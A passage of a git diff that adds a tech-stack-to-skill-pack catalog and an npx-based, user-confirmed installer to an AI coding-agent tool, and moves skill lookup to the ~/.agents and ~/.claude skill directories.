+      "vue-best-practices",
+      "vue-pinia-best-practices",
+      "vue-router-best-practices",
+      "vue-testing-best-practices",
+    ],
+    matchFiles: ["nuxt.config.ts", "nuxt.config.js", "vue.config.js", "vue.config.ts", "*.vue"],
+  },
+  // ── Svelte / SvelteKit ────────────────────────────────────────────────────
+  {
+    label: "Svelte",
+    description: "Svelte code patterns and SvelteKit best practices",
+    repo: "sveltejs/ai-tools",
+    skills: ["svelte-code-writer", "svelte-core-bestpractices"],
+    matchFiles: ["svelte.config.js", "svelte.config.ts"],
+  },
+  // ── Next.js ───────────────────────────────────────────────────────────────
+  {
+    label: "Next.js",
+    description: "Next.js app router, server components, and deployment patterns",
+    repo: "vercel-labs/vercel-plugin",
+    skills: ["nextjs"],
+    matchFiles: ["next.config.js", "next.config.ts", "next.config.mjs"],
+  },
+  {
+    label: "Next.js App Router Patterns",
+    description: "Next.js 14+ App Router, React Server Components, and streaming",
+    repo: "wshobson/agents",
+    skills: ["nextjs-app-router-patterns"],
+    matchFiles: ["next.config.js", "next.config.ts", "next.config.mjs"],
+  },
+  // ── Java / Spring Boot ────────────────────────────────────────────────────
+  {
+    label: "Java & Spring Boot",
+    description: "Spring Boot best practices, DI, RESTful APIs, JPA, testing, and security",
+    repo: "github/awesome-copilot",
+    skills: ["java-springboot"],
+    matchFiles: ["dep:spring-boot"],
+  },
+  // ── .NET / C# ────────────────────────────────────────────────────────────
+  {
+    label: ".NET & C#",
+    description: ".NET best practices, design patterns, and upgrade guidance",
+    repo: "github/awesome-copilot",
+    skills: ["dotnet-best-practices", "dotnet-design-pattern-review"],
+    matchLanguages: ["csharp"],
+    matchFiles: ["*.csproj"],
+  },
+  {
+    label: ".NET Backend Patterns",
+    description: ".NET backend architecture, middleware, and production patterns",
+    repo: "wshobson/agents",
+    skills: ["dotnet-backend-patterns"],
+    matchFiles: ["*.csproj", "*.fsproj", "*.sln"],
+  },
+  // ── Flutter / Dart ────────────────────────────────────────────────────────
+  {
+    label: "Flutter",
+    description: "Flutter layouts, architecture, state management, and testing",
+    repo: "flutter/skills",
+    skills: [
+      "flutter-building-layouts",
+      "flutter-architecting-apps",
+      "flutter-managing-state",
+      "flutter-testing-apps",
+    ],
+    matchLanguages: ["dart/flutter"],
+    matchFiles: ["pubspec.yaml"],
+  },
+  // ── PHP / Laravel ─────────────────────────────────────────────────────────
+  {
+    label: "PHP & Laravel",
+    description: "Laravel patterns, PHP best practices, and testing",
+    repo: "jeffallan/claude-skills",
+    skills: ["laravel-specialist", "php-pro"],
+    matchLanguages: ["php"],
+    matchFiles: ["composer.json"],
+  },
+  // ── Django ────────────────────────────────────────────────────────────────
+  {
+    label: "Django",
+    description: "Django expert patterns, models, views, and middleware",
+    repo: "vintasoftware/django-ai-plugins",
+    skills: ["django-expert"],
+    matchFiles: ["manage.py"],
+  },
+  // ── Rust ──────────────────────────────────────────────────────────────────
+  {
+    label: "Rust",
+    description: "Rust language patterns and best practices",
+    repo: "anthropics/skills",
+    skills: ["rust-best-practices"],
+    matchLanguages: ["rust"],
+    matchFiles: ["Cargo.toml"],
+  },
+  {
+    label: "Rust Async Patterns",
+    description: "Async Rust with Tokio, futures, and proper error handling",
+    repo: "wshobson/agents",
+    skills: ["rust-async-patterns"],
+    matchLanguages: ["rust"],
+    matchFiles: ["Cargo.toml"],
+  },
+  // ── Python ────────────────────────────────────────────────────────────────
+  {
+    label: "Python",
+    description: "Python patterns and best practices",
+    repo: "anthropics/skills",
+    skills: ["python-best-practices"],
+    matchLanguages: ["python"],
+    matchFiles: ["pyproject.toml", "setup.py", "requirements.txt"],
+  },
+  {
+    label: "Python Advanced",
+    description: "Python performance, testing, async patterns, and uv package manager",
+    repo: "wshobson/agents",
+    skills: [
+      "python-performance-optimization",
+      "python-testing-patterns",
+      "async-python-patterns",
+      "uv-package-manager",
+    ],
+    matchLanguages: ["python"],
+    matchFiles: ["pyproject.toml", "setup.py", "requirements.txt"],
+  },
+  // FastAPI — detected by scanning requirements.txt / pyproject.toml for the
+  // "fastapi" dependency. Uses the "dep:fastapi" synthetic marker from detection.ts.
+  {
+    label: "FastAPI",
+    description: "Production-ready FastAPI projects with async patterns and error handling",
+    repo: "wshobson/agents",
+    skills: ["fastapi-templates"],
+    matchFiles: ["dep:fastapi"],
+  },
+  // ── Go ────────────────────────────────────────────────────────────────────
+  {
+    label: "Go",
+    description: "Go language patterns and best practices",
+    repo: "anthropics/skills",
+    skills: ["go-best-practices"],
+    matchLanguages: ["go"],
+    matchFiles: ["go.mod"],
+  },
+  {
+    label: "Go Concurrency Patterns",
+    description: "Go concurrency with channels, worker pools, and context cancellation",
+    repo: "wshobson/agents",
+    skills: ["go-concurrency-patterns"],
+    matchLanguages: ["go"],
+    matchFiles: ["go.mod"],
+  },
+  // ── Database / ORM ─────────────────────────────────────────────────────────
+  {
+    label: "Prisma",
+    description: "Prisma ORM setup, schema design, client API, and migrations",
+    repo: "prisma/skills",
+    skills: [
+      "prisma-database-setup",
+      "prisma-client-api",
+      "prisma-cli",
+    ],
+    matchFiles: ["prisma/schema.prisma"],
+  },
+  {
+    label: "Supabase & Postgres",
+    description: "Supabase project setup, auth, Postgres best practices, and Firestore",
+    repo: "supabase/agent-skills",
+    skills: ["supabase-postgres-best-practices"],
+    matchFiles: ["supabase/config.toml"],
+  },
+  {
+    label: "PostgreSQL Design",
+    description: "PostgreSQL table design, indexing strategies, and query optimization",
+    repo: "wshobson/agents",
+    skills: ["postgresql-table-design"],
+    matchFiles: ["supabase/config.toml", "*.sql"],
+  },
+  {
+    label: "SQL Optimization & Review",
+    description: "Universal SQL performance optimization, security (injection prevention), and code review",
+    repo: "github/awesome-copilot",
+    skills: ["sql-optimization", "sql-code-review"],
+    matchFiles: [
+      "*.sql",
+      "*.sqlite",
+      "prisma/schema.prisma",
+      "supabase/config.toml",
+      "drizzle.config.ts",
+      "drizzle.config.js",
+    ],
+  },
+  {
+    label: "Redis",
+    description: "Redis development patterns and best practices",
+    repo: "redis/agent-skills",
+    skills: ["redis-development"],
+    matchFiles: ["redis.conf"],
+  },
+  // ── Cloud Platforms ────────────────────────────────────────────────────────
+  {
+    label: "Firebase",
+    description: "Firebase setup, auth, Firestore, hosting, and AI Logic",
+    repo: "firebase/agent-skills",
+    skills: [
+      "firebase-basics",
+      "firebase-auth-basics",
+      "firebase-firestore-basics",
+      "firebase-hosting-basics",
+      "firebase-ai-logic",
+    ],
+    matchFiles: ["firebase.json"],
+  },
+  {
+    label: "Azure",
+    description: "Azure deployment, AI services, storage, cost optimization, and diagnostics",
+    repo: "microsoft/github-copilot-for-azure",
+    skills: [
+      "azure-deploy",
+      "azure-ai",
+      "azure-storage",
+      "azure-cost-optimization",
+      "azure-diagnostics",
+    ],
+    matchFiles: ["azure-pipelines.yml"],
+  },
+  {
+    label: "AWS",
+    description: "AWS deployment, Lambda, and serverless patterns",
+    repo: "awslabs/agent-plugins",
+    skills: ["deploy", "aws-lambda", "aws-serverless-deployment"],
+    matchFiles: ["cdk.json", "samconfig.toml", "serverless.yml", "serverless.yaml"],
+  },
+  // ── Container / DevOps ─────────────────────────────────────────────────────
+  {
+    label: "Docker",
+    description: "Multi-stage Dockerfiles, layer optimization, and security hardening",
+    repo: "github/awesome-copilot",
+    skills: ["multi-stage-dockerfile"],
+    matchFiles: ["Dockerfile", "docker-compose.yml", "docker-compose.yaml"],
+  },
+  // ── Infrastructure as Code ─────────────────────────────────────────────────
+  {
+    label: "Terraform",
+    description: "Terraform style guide, testing, and stack patterns",
+    repo: "hashicorp/agent-skills",
+    skills: ["terraform-style-guide", "terraform-test", "terraform-stacks"],
+    matchFiles: ["main.tf"],
+  },
+  // ── Android (wshobson/agents — 7K installs) ────────────────────────────────
+  {
+    label: "Android",
+    description: "Android app design following Material Design 3 guidelines",
+    repo: "wshobson/agents",
+    skills: ["mobile-android-design"],
+    matchFiles: ["app/build.gradle", "app/build.gradle.kts"],
+  },
+  // ── Kubernetes (wshobson/agents — 4 skills) ────────────────────────────────
+  {
+    label: "Kubernetes",
+    description: "K8s manifests, Helm charts, GitOps workflows, and security policies",
+    repo: "wshobson/agents",
+    skills: [
+      "k8s-manifest-generator",
+      "helm-chart-scaffolding",
+      "gitops-workflow",
+      "k8s-security-policies",
+    ],
+    matchFiles: ["Chart.yaml", "kustomization.yaml"],
+  },
+  // ── CI/CD (wshobson/agents — 3 skills) ─────────────────────────────────────
+  {
+    label: "CI/CD Automation",
+    description: "Pipeline design, GitHub Actions workflows, and secrets management",
+    repo: "wshobson/agents",
+    skills: [
+      "deployment-pipeline-design",
+      "github-actions-templates",
+      "secrets-management",
+    ],
+    matchFiles: [".github/workflows"],
+  },
+  // ── Blockchain / Web3 (wshobson/agents — 3 skills) ─────────────────────────
+  {
+    label: "Blockchain & Web3",
+    description: "Solidity security, DeFi protocols, and smart contract testing",
+    repo: "wshobson/agents",
+    skills: ["solidity-security", "defi-protocol-templates", "web3-testing"],
+    matchFiles: ["hardhat.config.js", "hardhat.config.ts", "foundry.toml"],
+  },
+  // ── Data Engineering (wshobson/agents — 4 skills) ──────────────────────────
+  {
+    label: "Data Engineering",
+    description: "dbt transformations, Airflow DAGs, Spark optimization, and data quality",
+    repo: "wshobson/agents",
+    skills: [
+      "dbt-transformation-patterns",
+      "airflow-dag-patterns",
+      "spark-optimization",
+      "data-quality-frameworks",
+    ],
+    matchFiles: ["dbt_project.yml", "airflow.cfg"],
+  },
+  // ── Game Development — Unity (wshobson/agents) ─────────────────────────────
+  {
+    label: "Unity",
+    description: "Unity ECS patterns for high-performance game systems",
+    repo: "wshobson/agents",
+    skills: ["unity-ecs-patterns"],
+    matchFiles: ["ProjectSettings/ProjectVersion.txt"],
+  },
+  // ── Game Development — Godot (wshobson/agents) ─────────────────────────────
+  {
+    label: "Godot",
+    description: "Godot GDScript best practices and scene composition",
+    repo: "wshobson/agents",
+    skills: ["godot-gdscript-patterns"],
+    matchFiles: ["project.godot"],
+  },
+  // ── Essential (all projects) ────────────────────────────────────────────
+  {
+    label: "Skill Discovery",
+    description: "Find and install new agent skills from the ecosystem",
+    repo: "vercel-labs/skills",
+    skills: ["find-skills"],
+    matchAlways: true,
+  },
+  {
+    label: "Skill Authoring",
+    description: "Create, audit, and refine SKILL.md files",
+    repo: "anthropics/skills",
+    skills: ["skill-creator"],
+    matchAlways: true,
+  },
+  {
+    label: "Browser Automation",
+    description: "Browser automation for web scraping, testing, and interaction",
+    repo: "vercel-labs/agent-browser",
+    skills: ["agent-browser"],
+    matchAlways: true,
+  },
+  // ── General Tooling ───────────────────────────────────────────────────────
+  {
+    label: "Document Handling",
+    description: "PDF, DOCX, XLSX, PPTX creation and manipulation",
+    repo: "anthropics/skills",
+    skills: ["pdf", "docx", "xlsx", "pptx"],
+    matchAlways: true,
+  },
+  // ── Code Quality (wshobson/agents — matchAlways) ──────────────────────────
+  {
+    label: "Code Review & Quality",
+    description: "Code review excellence and error handling patterns",
+    repo: "wshobson/agents",
+    skills: ["code-review-excellence", "error-handling-patterns"],
+    matchAlways: true,
+  },
+  {
+    label: "Git Advanced Workflows",
+    description: "Advanced Git rebasing, cherry-picking, bisect, worktrees, and reflog",
+    repo: "wshobson/agents",
+    skills: ["git-advanced-workflows"],
+    matchAlways: true,
+  },
+];
+
+// ─── Greenfield Tech Stack Choices ────────────────────────────────────────────
+
+/**
+ * Tech stack → pack mappings for programmatic use.
+ *
+ * NOT shown directly to users during init (greenfield installs essentials
+ * only and defers stack-specific skills).  These mappings are available for:
+ *   1. The LLM to install skills after establishing a design
+ *   2. The `/gsd skills` command (explicit user request)
+ *   3. Re-running brownfield detection after project files are created
+ */
+export const GREENFIELD_STACKS: Array<{
+  id: string;
+  label: string;
+  description: string;
+  packs: string[];
+}> = [
+  {
+    id: "ios",
+    label: "iOS App",
+    description: "Full iOS development — SwiftUI, Swift, and all iOS frameworks",
+    packs: [
+      "SwiftUI",
+      "Swift Core",
+      "iOS App Frameworks",
+      "iOS Data Frameworks",
+      "iOS AI & ML",
+      "iOS Engineering",
+      "iOS Hardware",
+      "iOS Platform",
+    ],
+  },
+  {
+    id: "swift",
+    label: "Swift (non-iOS)",
+    description: "Swift packages, server-side Swift, CLI tools, SwiftUI without iOS",
+    packs: ["SwiftUI", "Swift Core"],
+  },
+  {
+    id: "react-web",
+    label: "React Web",
+    description: "React, Next.js, shadcn/ui, web frontend",
+    packs: ["React & Web Frontend", "TypeScript & JS Development", "React State & Patterns", "Tailwind CSS", "shadcn/ui", "Frontend Design & UX"],
+  },
+  {
+    id: "react-native",
+    label: "React Native",
+    description: "Cross-platform mobile with React Native",
+    packs: ["React Native", "React Native Architecture", "React & Web Frontend", "TypeScript & JS Development"],
+  },
+  {
+    id: "fullstack-js",
+    label: "Full-Stack JavaScript/TypeScript",
+    description: "Node.js backend + React frontend",
+    packs: ["React & Web Frontend", "TypeScript & JS Development", "React State & Patterns", "Tailwind CSS", "shadcn/ui", "Frontend Design & UX", "Prisma"],
+  },
+  {
+    id: "rust",
+    label: "Rust",
+    description: "Systems programming with Rust",
+    packs: ["Rust", "Rust Async Patterns"],
+  },
+  {
+    id: "python",
+    label: "Python",
+    description: "Python applications, scripts, or ML",
+    packs: ["Python", "Python Advanced"],
+  },
+  {
+    id: "go",
+    label: "Go",
+    description: "Go services and CLIs",
+    packs: ["Go", "Go Concurrency Patterns"],
+  },
+  {
+    id: "firebase",
+    label: "Firebase",
+    description: "Firebase backend — auth, Firestore, hosting, AI",
+    packs: ["Firebase"],
+  },
+  {
+    id: "aws",
+    label: "AWS",
+    description: "AWS deployment, Lambda, serverless",
+    packs: ["AWS"],
+  },
+  {
+    id: "azure",
+    label: "Azure",
+    description: "Azure deployment, AI, storage, diagnostics",
+    packs: ["Azure"],
+  },
+  {
+    id: "angular",
+    label: "Angular",
+    description: "Angular components, signals, forms, routing",
+    packs: ["Angular", "Angular Migration", "Frontend Design & UX"],
+  },
+  {
+    id: "vue",
+    label: "Vue.js / Nuxt",
+    description: "Vue.js with Pinia, Vue Router, and testing",
+    packs: ["Vue.js", "Frontend Design & UX"],
+  },
+  {
+    id: "svelte",
+    label: "Svelte / SvelteKit",
+    description: "Svelte 5 and SvelteKit patterns",
+    packs: ["Svelte", "Tailwind CSS", "Frontend Design & UX"],
+  },
+  {
+    id: "nextjs",
+    label: "Next.js",
+    description: "Next.js app router, React, and Vercel deployment",
+    packs: ["Next.js", "Next.js App Router Patterns", "React & Web Frontend", "TypeScript & JS Development", "Tailwind CSS", "shadcn/ui"],
+  },
+  {
+    id: "flutter",
+    label: "Flutter",
+    description: "Cross-platform Flutter/Dart development",
+    packs: ["Flutter"],
+  },
+  {
+    id: "java",
+    label: "Java / Spring Boot",
+    description: "Spring Boot APIs, JPA, and testing",
+    packs: ["Java & Spring Boot"],
+  },
+  {
+    id: "dotnet",
+    label: ".NET / C#",
+    description: "ASP.NET Core, Entity Framework, and design patterns",
+    packs: [".NET & C#", ".NET Backend Patterns"],
+  },
+  {
+    id: "php",
+    label: "PHP / Laravel",
+    description: "Laravel patterns and PHP best practices",
+    packs: ["PHP & Laravel"],
+  },
+  {
+    id: "django",
+    label: "Django",
+    description: "Django models, views, middleware, and Celery",
+    packs: ["Django", "Python", "Python Advanced"],
+  },
+  {
+    id: "fastapi",
+    label: "FastAPI",
+    description: "FastAPI web APIs with async patterns",
+    packs: ["FastAPI", "Python", "Python Advanced"],
+  },
+  {
+    id: "android",
+    label: "Android / Kotlin",
+    description: "Android app development with Material Design 3",
+    packs: ["Android"],
+  },
+  {
+    id: "kubernetes",
+    label: "Kubernetes",
+    description: "Kubernetes manifests, Helm charts, and GitOps",
+    packs: ["Kubernetes", "Docker"],
+  },
+  {
+    id: "blockchain",
+    label: "Blockchain / Web3",
+    description: "Solidity, DeFi protocols, and smart contract testing",
+    packs: ["Blockchain & Web3"],
+  },
+  {
+    id: "data-engineering",
+    label: "Data Engineering",
+    description: "dbt, Airflow, Spark, and data quality",
+    packs: ["Data Engineering", "Python", "Python Advanced"],
+  },
+  {
+    id: "unity",
+    label: "Unity",
+    description: "Unity game development with ECS patterns",
+    packs: ["Unity"],
+  },
+  {
+    id: "godot",
+    label: "Godot",
+    description: "Godot game development with GDScript",
+    packs: ["Godot"],
+  },
+  {
+    id: "other",
+    label: "Other / Skip",
+    description: "Install skills later with npx skills add",
+    packs: [],
+  },
+];
+
+// ─── Detection → Pack Matching ────────────────────────────────────────────────
+
+/**
+ * Match project signals to relevant skill packs.
+ * Returns packs in catalog order (not sorted by match type).
+ */
+export function matchPacksForProject(signals: ProjectSignals): SkillPack[] {
+  const matched = new Set<SkillPack>();
+
+  for (const pack of SKILL_CATALOG) {
+    // Language match
+    if (pack.matchLanguages && signals.primaryLanguage) {
+      if (pack.matchLanguages.includes(signals.primaryLanguage)) {
+        matched.add(pack);
+        continue;
+      }
+    }
+
+    // File match
+    if (pack.matchFiles) {
+      for (const file of pack.matchFiles) {
+        if (signals.detectedFiles.includes(file)) {
+          matched.add(pack);
+          break;
+        }
+      }
+    }
+
+    // Xcode platform match (e.g. iOS packs only when SDKROOT = iphoneos)
+    if (pack.matchXcodePlatforms && signals.xcodePlatforms.length > 0) {
+      const hasMatch = pack.matchXcodePlatforms.some((p) => signals.xcodePlatforms.includes(p));
+      if (hasMatch) matched.add(pack);
+    }
+
+    // Always-include packs (essentials)
+    if (pack.matchAlways) {
+      matched.add(pack);
+    }
+  }
+
+  return [...matched];
+}
+
+// ─── Installation ─────────────────────────────────────────────────────────────
+
+/**
+ * Install a skill pack via the skills.sh CLI.
+ * Runs: npx skills add <repo> --skill <name> ... -y
+ *
+ * Returns true if installation succeeded.
+ */
+export function installSkillPack(pack: SkillPack): Promise<boolean> {
+  return new Promise((resolve) => {
+    // --yes = npx auto-install, -y = skills.sh non-interactive
+    const args = ["--yes", "skills", "add", pack.repo];
+
+    for (const skill of pack.skills) {
+      args.push("--skill", skill);
+    }
+    args.push("-y");
+
+    execFile("npx", args, { timeout: 120_000 }, (error) => {
+      resolve(!error);
+    });
+  });
+}
+
+/**
+ * Install multiple packs, batching by repo to minimize npx invocations.
+ * Returns the labels of successfully installed packs.
+ */
+export async function installPacksBatched(
+  packs: SkillPack[],
+  onProgress?: (label: string) => void,
+): Promise<string[]> {
+  // Group packs by repo
+  const byRepo = new Map<string, { skills: string[]; labels: string[] }>();
+  for (const pack of packs) {
+    const entry = byRepo.get(pack.repo) ?? { skills: [], labels: [] };
+    entry.skills.push(...pack.skills);
+    entry.labels.push(pack.label);
+    byRepo.set(pack.repo, entry);
+  }
+
+  const installed: string[] = [];
+  for (const [repo, { skills, labels }] of byRepo) {
+    onProgress?.(labels.join(", "));
+    const ok = await new Promise<boolean>((resolve) => {
+      // --yes = npx auto-install, -y = skills.sh non-interactive
+      const args = ["--yes", "skills", "add", repo];
+      for (const skill of skills) {
+        args.push("--skill", skill);
+      }
+      args.push("-y");
+      execFile("npx", args, { timeout: 120_000 }, (error) => {
+        resolve(!error);
+      });
+    });
+    if (ok) installed.push(...labels);
+  }
+  return installed;
+}
+
+/**
+ * Check if any skills from a pack are already installed.
+ * Searches both the skills.sh ecosystem directory and Claude Code's official directory.
+ */
+export function isPackInstalled(pack: SkillPack): boolean {
+  const skillsDirs = [
+    join(homedir(), ".agents", "skills"),
+    join(homedir(), ".claude", "skills"),
+  ];
+
+  return pack.skills.every((name) =>
+    skillsDirs.some((dir) => existsSync(join(dir, name, "SKILL.md"))),
+  );
+}
+
+// ─── Init Wizard Integration ──────────────────────────────────────────────────
+
+/**
+ * Run skill installation step during project init.
+ *
+ * Brownfield (signals.detectedFiles.length > 0):
+ *   Auto-detects tech stack → shows matched packs → installs accepted ones.
+ *
+ * Greenfield (no files detected):
+ *   Installs essential packs only (find-skills, skill-creator, etc.).
+ *   Stack-specific skills are deferred — once the LLM establishes a design
+ *   and creates project files (package.json, firebase.json, etc.), brownfield
+ *   detection will pick them up on the next `gsd init` or via auto-mode
+ *   skill discovery.
+ *
+ * Returns the list of installed pack labels.
+ */
+export async function runSkillInstallStep(
+  ctx: ExtensionCommandContext,
+  signals: ProjectSignals,
+): Promise<string[]> {
+  const installed: string[] = [];
+  const isBrownfield = signals.detectedFiles.length > 0;
+
+  if (isBrownfield) {
+    // ── Brownfield: auto-detect and confirm ─────────────────────────────────
+    const matched = matchPacksForProject(signals);
+    if (matched.length === 0) return installed;
+
+    // Filter out already-installed packs
+    const toInstall = matched.filter((p) => !isPackInstalled(p));
+    if (toInstall.length === 0) return installed;
+
+    // Group for display: Swift packs vs iOS packs vs other
+    const swiftPacks = toInstall.filter((p) => p.matchLanguages?.includes("swift"));
+    const iosPacks = toInstall.filter((p) => p.matchXcodePlatforms?.includes("iphoneos"));
+    const otherPacks = toInstall.filter((p) => !swiftPacks.includes(p) && !iosPacks.includes(p));
+
+    const summaryLines: string[] = [];
+    const hasIOS = signals.xcodePlatforms.includes("iphoneos");
+    if (hasIOS) {
+      summaryLines.push(`Detected: iOS project (${signals.primaryLanguage ?? "swift"})`);
+    } else if (signals.xcodePlatforms.length > 0) {
+      summaryLines.push(`Detected: ${signals.xcodePlatforms.join(", ")} Xcode project (${signals.primaryLanguage ?? "swift"})`);
+    } else {
+      summaryLines.push(`Detected: ${signals.primaryLanguage ?? "unknown"} project`);
+    }
+    summaryLines.push("");
+    summaryLines.push("Recommended skill packs:");
+    if (swiftPacks.length > 0) {
+      summaryLines.push(`  Swift: ${swiftPacks.map((p) => p.label).join(", ")}`);
+    }
+    if (iosPacks.length > 0) {
+      summaryLines.push(`  iOS: ${iosPacks.map((p) => p.label).join(", ")}`);
+    }
+    for (const p of otherPacks) {
+      summaryLines.push(`  • ${p.label}: ${p.description}`);
+    }
+
+    const totalSkills = toInstall.reduce((n, p) => n + p.skills.length, 0);
+    const choice = await showNextAction(ctx, {
+      title: "GSD — Install Skills",
+      summary: summaryLines,
+      actions: [
+        {
+          id: "install",
+          label: "Install recommended skills",
+          description: `Install ${totalSkills} skills from ${toInstall.length} pack${toInstall.length > 1 ? "s" : ""} via skills.sh`,
+          recommended: true,
+        },
+        {
+          id: "skip",
+          label: "Skip",
+          description: "Install skills later with npx skills add",
+        },
+      ],
+      notYetMessage: "Run /gsd init when ready.",
+    });
+
+    if (choice === "install") {
+      const labels = await installPacksBatched(toInstall, (label) => {
+        ctx.ui.notify(`Installing ${label} skills...`, "info");
+      });
+      installed.push(...labels);
+      const failed = toInstall.filter((p) => !installed.includes(p.label));
+      for (const pack of failed) {
+        ctx.ui.notify(`Failed to install ${pack.label} — try manually: npx skills add ${pack.repo}`, "info");
+      }
+    }
+  } else {
+    // ── Greenfield: install essentials only ─────────────────────────────────
+    // Don't ask the user what tech stack they're building — they may not know
+    // yet, especially non-technical users. Install essential packs (discovery,
+    // authoring, browser, docs) and let stack-specific skills auto-detect later
+    // once the LLM establishes the design and creates project files.
+    const essentials = SKILL_CATALOG.filter((p) => p.matchAlways && !isPackInstalled(p));
+    if (essentials.length === 0) return installed;
+
+    const totalSkills = essentials.reduce((n, p) => n + p.skills.length, 0);
+    const choice = await showNextAction(ctx, {
+      title: "GSD — Install Essential Skills",
+      summary: [
+        "GSD will install essential agent skills (skill discovery, authoring,",
+        "browser automation, document handling).",
+        "",
+        "Stack-specific skills (React, Swift, Python, etc.) will be recommended",
+        "automatically once your project files are in place.",
+      ],
+      actions: [
+        {
+          id: "install",
+          label: "Install essentials",
+          description: `Install ${totalSkills} essential skills via skills.sh`,
+          recommended: true,
+        },
+        {
+          id: "skip",
+          label: "Skip",
+          description: "Install skills later with npx skills add",
+        },
+      ],
+      notYetMessage: "Run /gsd init when ready.",
+    });
+
+    if (choice === "install") {
+      const labels = await installPacksBatched(essentials, (label) => {
+        ctx.ui.notify(`Installing ${label} skills...`, "info");
+      });
+      installed.push(...labels);
+    }
+  }
+
+  if (installed.length > 0) {
+    ctx.ui.notify(`Installed: ${installed.join(", ")}`, "info");
+  }
+
+  return installed;
+}
diff --git a/src/resources/extensions/gsd/skill-discovery.ts b/src/resources/extensions/gsd/skill-discovery.ts
index f623c1a21..459236635 100644
--- a/src/resources/extensions/gsd/skill-discovery.ts
+++ b/src/resources/extensions/gsd/skill-discovery.ts
@@ -10,9 +10,11 @@
 
 import { existsSync, readdirSync, readFileSync } from "node:fs";
 import { join } from "node:path";
-import { getAgentDir } from "@gsd/pi-coding-agent";
+import { homedir } from "node:os";
 
-const SKILLS_DIR = join(getAgentDir(), "skills");
+/** Skills directories — skills.sh ecosystem + Claude Code official */
+const SKILLS_DIR = join(homedir(), ".agents", "skills");
+const CLAUDE_SKILLS_DIR = join(homedir(), ".claude", "skills");
 
 export interface DiscoveredSkill {
   name: string;
@@ -57,8 +59,9 @@ export function detectNewSkills(): DiscoveredSkill[] {
   for (const dir of current) {
     if (baselineSkills.has(dir)) continue;
 
-    const skillMdPath = join(SKILLS_DIR, dir, "SKILL.md");
-    if (!existsSync(skillMdPath)) continue;
+    // Check both skill directories for the SKILL.md file
+    const skillMdPath = resolveSkillMdPath(dir);
+    if (!skillMdPath) continue;
 
     const meta = parseSkillFrontmatter(skillMdPath);
     if (meta) {
@@ -96,10 +99,10 @@ ${entries}
 
 // ─── Internals ────────────────────────────────────────────────────────────────
 
-function listSkillDirs(): string[] {
-  if (!existsSync(SKILLS_DIR)) return [];
+function listSkillDirsFrom(dir: string): string[] {
+  if (!existsSync(dir)) return [];
   try {
-    return readdirSync(SKILLS_DIR, { withFileTypes: true })
+    return readdirSync(dir, { withFileTypes: true })
       .filter(d => d.isDirectory())
       .map(d => d.name);
   } catch {
@@ -107,6 +110,13 @@ function listSkillDirs(): string[] {
   }
 }
 
+function listSkillDirs(): string[] {
+  const names = new Set<string>();
+  for (const name of listSkillDirsFrom(SKILLS_DIR)) names.add(name);
+  for (const name of listSkillDirsFrom(CLAUDE_SKILLS_DIR)) names.add(name);
+  return [...names];
+}
+
 function parseSkillFrontmatter(path: string): { name?: string; description?: string } | null {
   try {
     const content = readFileSync(path, "utf-8");
@@ -130,6 +140,14 @@ function parseSkillFrontmatter(path: string): { name?: string; description?: str
   }
 }
 
+function resolveSkillMdPath(skillName: string): string | null {
+  for (const dir of [SKILLS_DIR, CLAUDE_SKILLS_DIR]) {
+    const candidate = join(dir, skillName, "SKILL.md");
+    if (existsSync(candidate)) return candidate;
+  }
+  return null;
+}
+
 function escapeXml(text: string): string {
   return text
     .replace(/&/g, "&amp;")
diff --git a/src/resources/extensions/gsd/skill-health.ts b/src/resources/extensions/gsd/skill-health.ts
index e08ce3352..6caca9464 100644
--- a/src/resources/extensions/gsd/skill-health.ts
+++ b/src/resources/extensions/gsd/skill-health.ts
@@ -13,9 +13,9 @@
  * research identified as critical for skill quality.
  */
 
-import { existsSync, readFileSync, readdirSync } from "node:fs";
+import { existsSync, readFileSync, readdirSync, statSync } from "node:fs";
 import { join } from "node:path";
-import { getAgentDir } from "@gsd/pi-coding-agent";
+import { homedir } from "node:os";
 import type { UnitMetrics, MetricsLedger } from "./metrics.js";
 import { formatCost, formatTokenCount, loadLedgerFromDisk } from "./metrics.js";
 import { getSkillLastUsed, detectStaleSkills } from "./skill-telemetry.js";
@@ -207,10 +207,14 @@ export function formatSkillDetail(basePath: string, skillName: string): string {
     lines.push(`  ${date}  ${u.id.padEnd(20)}  ${formatTokenCount(u.tokens.total).padStart(8)} tokens  ${formatCost(u.cost)}`);
   }
 
-  // Check for SKILL.md existence
-  const skillPath = join(getAgentDir(), "skills", skillName, "SKILL.md");
-  if (existsSync(skillPath)) {
-    const stat = require("node:fs").statSync(skillPath);
+  // Check for SKILL.md existence — search both ecosystem and Claude Code directories
+  const candidatePaths = [
+    join(homedir(), ".agents", "skills", skillName, "SKILL.md"),
+    join(homedir(), ".claude", "skills", skillName, "SKILL.md"),
+  ];
+  const skillPath = candidatePaths.find(p => existsSync(p));
+  if (skillPath) {
+    const stat = statSync(skillPath);
     lines.push("");
     lines.push(`SKILL.md: ${skillPath}`);
     lines.push(`Last modified: ${stat.mtime.toISOString().slice(0, 10)}`);
@@ -283,7 +287,8 @@ export function computeStaleAvoidList(
   staleDays?: number,
 ): string[] {
   const ledger = loadLedgerFromDisk(basePath);
-  const units = (ledger?.units ?? []).filter(u => u.skills && u.skills.length > 0);
+  if (!ledger) return [];
+  const units = ledger.units.filter(u => u.skills && u.skills.length > 0);
   const stale = detectStaleSkills(units, staleDays ?? DEFAULT_STALE_DAYS);
   const avoidSet = new Set(currentAvoidList);
 
diff --git a/src/resources/extensions/gsd/skill-telemetry.ts b/src/resources/extensions/gsd/skill-telemetry.ts
index ac99e4e83..e5ec9c82c 100644
--- a/src/resources/extensions/gsd/skill-telemetry.ts
+++ b/src/resources/extensions/gsd/skill-telemetry.ts
@@ -13,7 +13,7 @@
 
 import { existsSync, readdirSync, readFileSync, statSync } from "node:fs";
 import { join } from "node:path";
-import { getAgentDir } from "@gsd/pi-coding-agent";
+import { homedir } from "node:os";
 
 // ─── In-memory state ──────────────────────────────────────────────────────────
 
@@ -30,8 +30,16 @@ const activelyLoadedSkills = new Set<string>();
  * Called before each unit starts.
  */
 export function captureAvailableSkills(): void {
-  const skillsDir = join(getAgentDir(), "skills");
-  availableSkills = listSkillNames(skillsDir);
+  const skillsDir = join(homedir(), ".agents", "skills");
+  const claudeSkillsDir = join(homedir(), ".claude", "skills");
+  const legacyDir = join(homedir(), ".gsd", "agent", "skills");
+  const names = listSkillNames(skillsDir);
+  const claudeNames = listSkillNames(claudeSkillsDir);
+  // Include skills still in the legacy directory only if migration hasn't completed
+  const legacyMigrated = existsSync(join(legacyDir, ".migrated-to-agents"));
+  const legacyNames = legacyMigrated ? [] : listSkillNames(legacyDir);
